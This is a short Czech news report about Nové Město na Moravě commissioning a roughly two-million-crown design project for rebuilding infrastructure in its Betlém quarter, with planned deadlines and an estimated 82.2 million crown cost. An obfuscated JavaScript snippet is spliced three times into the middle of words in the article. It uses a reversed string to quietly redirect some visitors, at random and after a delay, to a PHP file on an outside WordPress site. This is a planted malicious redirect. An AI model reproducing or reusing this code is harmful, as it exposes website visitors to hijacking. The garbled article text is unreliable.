Rainbow page separator

V Novém Městě nechají připravit projekt na obnovu Betléma

Pondělí, 27. února 2023

Nové Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Projekt na rekonstrukci infrastruktury ve čtvrti zvané Betlém se rozhodli nechat vypracovat v Novém Městě. Projek$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tová dokumentace pro územní rozhodnutí a stavební povolení má být ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tova do konce října příštího roku a prováděcí dokumentace pak do závěru února 2025. Nabídková cena za přípravu kompletního projektu představuje bezmála dva miliony a obsáhne i náklady na geodetické zaměření stávajícího stavu řešeného území nad rámec dat z digitální technické mapy města. Předpokládané finanční náklady na provedení rekonstrukce infrastruktury v okrajové části Nového Města se v současné době pohybují kolem 82,2 milionu korun bez DPH. První přípravné činnosti by výhledově mohly začít ještě v roce 2024 a úvodní etapa rekonstrukčních prací o rok později.